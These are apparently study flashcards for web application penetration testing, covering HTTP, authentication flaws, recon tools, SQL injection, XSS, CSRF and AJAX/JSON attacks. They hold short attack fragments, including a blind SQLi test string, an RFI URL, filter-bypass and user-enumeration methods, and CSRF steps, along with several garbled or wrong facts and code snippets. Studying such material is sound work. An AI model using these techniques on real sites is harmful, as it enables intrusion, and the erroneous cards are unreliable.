WEB APP Flashcards
What is the difference between a web server and a Dynamic type of server?
Web server just serves out static content, whereas dynamic content can reference a back end data store and server active content; most modern web applications are considered dynamic servers, running content
What is an application server?
A server referenced by the web/dynamic server that executes code; things like Websphere, JBOSS, Weblogic, etc.
What was improved from HTTP 1.0 to 1.1?
caching support, extensions, bandiwth optimization, host header field
What is “push promise” ?
A feature of HTTP 2, it allows a web server to send content before the client has requested it. Like a predictive version of AJAX.
What is http multiplexing?
A feature of HTTP 2, it allows a server to request multiple sockets at once to requests resources in parallel, rather than “pipelining” it all through the same connection.
What moves HTTP to a text-based-on-the-wire type of connection to a binary form?
HTTP 2.0, which gives it better compression and reduces overhead/complexity
What string in an http request identifies the type of client software used to connect?
User-agent string. Describes the web client.
Where is the web server technology identified in an HTTP request?
the “server” field
What is Windows 7/2008 listed as in the user-agent string? Windows 8/2012?
NT 6.1 and NT 6.3
What is the difference between GET and POST?
Both request data from server, but GET uses the URL to pass parameters, POST uses the payload
Why is POST more secure than GET?
Parameters aren’t written to web server or proxy logs
What echoes an HTTP request as seen by the server back to a client, for diagnostics?
TRACE
What HTTP request asks the server to return the list of request methods it supports? (which can then be used for interchange)
OPTIONS
Method used when accessing the an application through a proxy server.
CONNECT
How does a CONNECT request work?
The client connects to the proxy, and the CONNECT request tells the server where to go to connect to the resource
What HTTP method is used for WebDAV attacks, and where are those type of systems usually found?
PUT, which lets you upload data to a resource that you specify. Found on intranet web servers, occasionally.
“Switching Protocols” HTTP status code
101 (info)
“redirect” HTTP status code
302
“Not modified” HTTP status code, and what is it for?
304; used to say that the content hasn’t changed, so the client can continue to use data that has been cached.
“Unauthorized” to access http status code (use authentication to access this)
401
Page not found HTTP status code
404
Server error HTTP status code series
5xx
Websockets were integrated with the __________ technology scheme
HTML5
This protocol establishes a bi-directional comm pipe over a SINGLE tcp socket
websocket
How is a websocket established? How does it work?
A socket is established using JS/HTML5 code; a 101 (switching protocols) request is passed, and then requests are handled with the ws:// or wss:// protocol. Typically used with a .js file, but can be found insie an HTML page itself with
What is method interchange?
When you are able to use a GET in lieu of a POST, etc.
_______ authentication uses a base64 encoding when passed over the network, and uses a “real” to identify itself.
Basic
How does basic authentication handle the actual process of authenticating?
The web server handles it. IIS uses local accounts, apache uses .htaccess
What are some problems with basic authentication? (Things an attacker will look for)
- No account lockout/max attempts
- Auth traffic passed in clear
- Can easily be replayed
- No log out functionality w/o closing browser
What is added to basic auth to to improve it in digest auth?
A nonce is added as a salt to the the md5 hashing off the password
Why is digest auth not much more secure than basic?
The nonce (used as a salt in the md5 hashing of the password) is passed in the clear, making it vulnerable to man in the middle attacks
Integrated windows auth is perfect for ______ types of attacks
XSS/CSRF; if you can take over a client browser, you can get access to the web server
Typically, the authentication in “forms based” auth is handled by
LDAP or a backend database; the user requests the form, fills out the form, and submits it; the application (not the underlying web server) processes the request and either sends an error or returns the resource.
Attack vectors (issues) for forms based auth
- Developer responsible for implementing proper security controls
- Possible to sniff/intercept tokens/cookies/sessions
- Possible to spoof the site (create a phishing attack)
Three parties for an Oauth transaction
User (@user)
Consumer (Tweetbot)
Service provider (Twitter)
Three items exchanged as part of an OAuth transaction
- Request token
- Secret
- Access token
The secret is used to sign the request, which then goes back to the service provider. An access token is generated and given back to the service provider, which is used to post the data.
Hackers look for what in OAuth
- Want to find the secret key (due to insecure storage or interception)
- Highly dependent on consumer service to get the implementation right/regenerate key properly
- Possible to spoof the sight, steal the username/password
Difference between OAuth 1.0 and 2.0
- SSL required for all 2.0 communications
- Signatures not required for API calls once token is generated in 2.0
- Tokens in 2.0 expire
- Less data generated in 2.0
SSL/TLS relies on _________ for encryption, which relies on trust with a ____________
PKI, certificate store
When a browser requests an HTTPS page, it receives ______________.
The servers public key
Heartbleed is a vulnerability in ________ and allows for the attacker to _____________.
SSL; read 64k chunks of memory and things resident there. (Username, passwords, server private key)
Nmap script to check heartbleed
ssl-heartbleed.nse
Five parts of the Sans reporting format
Exec summary Introduction Methodology Findings Conclusions (optional: Presentation)
Stages of the Sans Web app pen test methodology
Recon
Mapping
Discovery
Exploitation
What is included with WHOIS record?
Identifies owner Authoritative name servers Email addresses Phone numbers Names of tech POCs
What does DIG output that NSLOOKUP does not?
Specific types of DNS records (MX, AXFR (zone xfr) ANY)
What is the fierce scanner for?
Designed to find hosts on a domain, using DNS queries. Will guess host names using a wordlist
What does DNSrecon do?
Collects all of the standard records it can find from the domain, including SRV records (that can point to other attack vectors)
Reverse lookup for a range of IP addresses
To omit a page or pages with specific strings from a google search
Use the “-“ key (site:www.sans.org -handlers)
The google dorks (Google Hacking DB) is a repository of __________ and is found at _________.
Very specific searches, such as those finding webcams with default credentials and indexes/stock password pages.
It can be found at exploitdb
Operators used in Shodan for finding things:
Finds devices based on city, country, lat/long, IP, hostname, operating system
What is the “Google dorks” of Shodan? (The site where you can find legit uses of Shodan)
SHINE (www.infracritical.com) Finds things like: Medical devices Traffic lights Serial port servers Data radios Webcams/CCTVS
Tool that will search all the documents it can find on a site for METADATA (thinks like users, folders, printers, type of software, etc)
FOCA (Fingerprinting Orgs with Collected Archives)
Tool that gathers information about domains via PUBLIC information sources (IP addresses, emails, hosts, etc)
The Harvester
3 Tools that can be used to perform server foot printing
NMAP (with the -sV option)
Netcat: Connect to and grab the server string (i.e., connect and request a page, check response)
Netcraft toolbar
Tool used (like Netcat) to perform SSL checks
OpenSSL (with it’s switches)
Ex: OpenSSL s_client -connect www.testurl.com
.Net app that tests the strength of a web applications SSL ciphers
SSLDigger
Free, publicly accessible site for testing the SSL configuration/strength of a publicly facing website. Gives you a nicely formatted output report
Qualys SSL Labs
Easy test for heartbleed
the NMAP heartbleed script (–script=ssl-enum-ciphers heart.bleed -oN)
Two types of virtual hosting
IP based: every host has a unique IP
Name based: every host shares an IP, and packets are addressed with the “host” field of the payload.
Most common form of virtual hosting
Name based, which means all hosts share an IP but packets are multiplexed based on “host” field of packets
Internet resource that can detect virtual hosting
Bing. use ip: to see all the host names that are returned on that IP
How to identify load balancers in use
URL analysis (sans.org vs. www2.sans.org) timestamps of responses
examine the “last modified” date on the packet headers
cookies! Load balancers usually save a cookie on the browser machine that directs them to the same server they initially made the request on (look for “load” or “LB” or balancer in the cookie name)
Look for differences in HTTPS: different certificate names or cipher versoins
Look for differences in the comments/source code
Best tool for checking the method interchange (seeing what methods a web server requests)
netcat; just try to request each type of function. Can be easily scripted.
Browser extensions that give you insight into operating systems, web servers, packaged web applications, Languages, frameworks, and APIS for a site that you visit
Netcraft and Wappalyzer
How to get wget to ignore the robots.txt file and download all of a site’s content recursively
Wget -r -l -3
-3 gives it a recursive depth of 3
Once you have a site map and have conducted flow charting, the next step to analyzing a web site is:
Relationship Analysis: Shows how the components of a web application relate to each other. Place to look for authentication bypass or authorization bypass.
Why is it important to analyze junctions between code written by two different developers?
Misunderstandings are common; one developer may assume that authentication/authorization is handled by a different part of the app, for example
Also, if you find a vulnerability in one part of the code, you can then move to see if the problem is systemic
Cross-platform Java app that checks to see if pages exist based on a word list
OWASPs dirbuster
4 Things used to maintain “session” for a browser
Cookies (USERID)
URL parameters
Hidden form fields
IP/Browser info
Cookies that look like
- S2V2aW4gS9obnNvbg==
- 72b27b1b696ecaadfc0f212f16809850
- 655609cdf493495c9f166e6d
- Base64
- Md5sum
- Hex-encoded output from crypt
3 ways to collect session information from a web site
- Manually (repeatedly request, check session tokens)
- Custom scripts
- Burp
Difference between session data passed by GET and POST
Get passes it in the URL, Post passes it through hidden form elements in the payload
(They can also pass it in the cookie, or in a ViewState variable)
How to determine what a specific type of framework/web app uses to store sessions
Google, idiot
When developers create their own session IDs, they typically use the ____________ to create a token
The clients IP address
Burp mode to analyze session tokens
Sequencer: we seed it URLs, and it tells you the method used to create the session token. Will tell you the randomness of the tokens when you give it other things to compare with.
How to define a python variable (individual and array)
Name = "blah and blah" year = 1980
Relics = (“Holy grail, “Holy Hand grenade”, “Knights”)
How to store a name/value pair in Python
“Name”: “Value”,
knights = (“Lancelot”:”The brave”)
Print( knights(“Lancelot”)
How to comment in Python
Single line: #
Multi line:
“”
‘’’
To define a python function, and then call it
Define: def
Call: fuctionname() with required inputs in the parents
How to manipulate a file in Python
“Open”
“Read” loads the entire file into a string”
“Readlines” returns the entire file as a list
“Write” writes to the file
“Close”
Part of Burp suite used to analyze the randomness of session tokens
Burp Sequencer. Checks the entropy, looks for predictability.
Part of burp used to determine the specific way data is encrypted/compressed/encoded
Decoder
Pitchfork fuzzing attack in burp is used if…
Each payload position needs to be fuzzed simultaneously
Useful if related injections are needed
Battering ram fuzzing attack in Burp is used when…
One set of payloads will be injected into multiple positions
Some places to look for errors in a forms page that will let you know if the user account being checked is valid
HTTP Redirects (302) Changes in the URL (=1 for existing accounts,=2 for nonexistent) Differences in the size of the page returned (use burp comparer)
Python script that iterates user accounts based on a word list and tries to dump them into a forms account
User_enum script
Command injection example
Using a DNS entry form to insert Linux commands to the underlying operating system.
HTTP://multiplicand/index.pho?page=http://127.0.0.1/id.txt is an example of….
RFI.
“Incorrect syntax near’ “ is an error message from a ________ DB
MS SQL
“You have an error in your SQL syntax” is an error message from ________ kinds of DBs
MySQL error
To create some database object like a record, table, or stored-procedure use the ______ cmd
CREATE
The __________ command adds conditions to a SQL query
WHERE
the __________ command deletes data from a SQL DB
DROP (drop user_table;)
All SQL commands end with
;
Select a part of the string in a SQL command
SUBSTRING
Standard SQL query looks like:
Select from ;
How do we use Boolean statements to look for Blind SQL?
We can send an acceptable SQL statement that returns YES if a condition is met.
IE, return index.php?itemid=0’ and 1=1; –
Python based framework to speed th exploitation of blind SQL injection flaws
Does binary and frequency searches: BBQSQL
A JavaScript “switch” statement is used to
Choose between multiple conditions; the case runs until the break is encountered. (Iterates through different case statements until one is executed and a break happens)
JavaScript variables are defined by
Loosely typing them. var x; or var x=”Sarah”;
A JavaScript “even” is…
A thing that happens that calls a function. Such as “onload” or “onclick” being when the page loads or an item is clicked, respectively.
What does the “Find_accounts” python script do
Lets you iterate through a word list of last names to see if they can find the /URL/~username pages.
Things that a script can NOT change in the request and expect to get a response because of same original policy
Port, host name, protocol.
Two application filtering methods used to screen XSS traffic
Whitelist and Blacklists
THREE methods to bypass input filtering
Encoding (Unicode, hex, etc)
Using an IMG tag instead of SCRIPT tags
Most common way to get a user to actuate reflected XSS
Phishing. (Send them a crafted link)
Is DOM XSS considered reflected or persistent?
Reflected
Most common type of system exploited with DOM-based XSS
Hybrid/Mashup/Analytic systems, where they need to use the URL or other information from another box
What is an “admin” type of persistent XSS flaw?
When you find a stored XSS flaw that requires admin approval: way to attack admin users, g’tee higher privilege level of first look
What actually executes a DOM based XSS attack?
The browser; the web page uses values from the URL (GETS)
Everything executed within the browser
Tool used to test for both XSS and SQLi on the a page.
TamperData
Python based script that is used to automate testing for reflected XSS. Attacks a specific URL. Can crawl the site to discover additional points or funnel through a proxy.
XSSSniper
Python XSS discovery tool with a GUI front end that can attempt to find filtering and bypass it. Has “special techniques” to attack things like USer-agents, Referers, cookies, etc.
XSSer
XSS tool that injects a specific string everywhere in the site to see if it will reflect back to the browser
XSScrapy
Two best parts of Burp to check for reflected XSS content
Use the Battering Ram payload, to test at multiple positions with one string
Use “Grep payloads” to search through the application responses for that string
Key to CSRF attacks being viable
When transactions on a page use predictable parameters.
Four step process for finding CSRF in an application
- Review the app logic
- Find functions that have predictable parameters and are worth screwing with
- Create a page with a link that executes that transaction
- Get an attacker to click on the link once they’ve already logged into the app with the predictable parameters
Python application that hosts CSRF for testing and lets you automate CSRF attacks
Monkey first
The xmlhttp.open AJAX request establishes
The properties of the request; GET or POST, and the resource being retrieved.
It does NOT initiate the request
Xmlhttp.send() does…
Actually creates the connection with the URL
Xmlhttp.onreadystatechange does…
Sets which function should be called when the ready state changes. (I.e., when the ready state number increases, what function gets called)
XML.readystate does what?
A number, 0-4, that provides information about the state of the of the request. Can set different function (actions) for each ready state.
0-initialized 1-request has been set up 2-request has been sent 3-waiting for a response 4-response complete/received
XMLhttp.responseText does what?
Is the property that contains the contents of the response from the server
What is a “mash up” Web 2.0 server
A web server that integrates application widgets from multiple other sites to create a “mash-up” of connectivity. May require a proxy capability to work around same-origin restrictions.
What is a proxy mash up feature?
When one application retrieves code from multiple other sites, using xmlhttp requests, and then delivers it to the client
Why mash up application proxy servers can be attacked
If we can change the URL parameters (from POST to GET) we can have it retrieve content from malicious sources, or browse to other internet locations
Application for performing android mobile code testing?
Base-androidlabs app, developed by security compass
API file attacks with AJAX is commonly exploited by…
Looking for function calls that are loaded by scripts but NOT used by the app and using them for malicious purposes. (For example, using an “add users” function despite not having access to the admin page)
WHy is it a good idea to find third party API/libraries when mapping source content?
Can use these libraries, which are pre-built and add functionality to a site, to carry out attacks.
Things to look for that may call attention in source code to third party APIs and libraries? (Such as query or Google web toolkit)
SRC attributes, XHR requests
What is JSON?
Similar to XML, but strictly for JavaScript/JAVA. It’s an array of arrays, or a “flat DB” of objects that can be parsed by JS and used to pass large amounts of data
Why is JSON often vulnerable to information disclosure?
Application developers don’t want to parse requests both at the server and at the client, so often huge data sets are send to the client app and then parsed to display only what the browser needs
Book method for injecting JSON content
Prematurely complete an object, insert a JS string, and comment the rest of the code out with //
Automated scanner that mainly acts as a passive proxy and collects data on a site as you walk it.
RatProxy
free, open source Automated scanner that performs adaptive scanning, brute forcing, and handles multiple languages at once (php, ASPX, etc). Uses
Skipfish
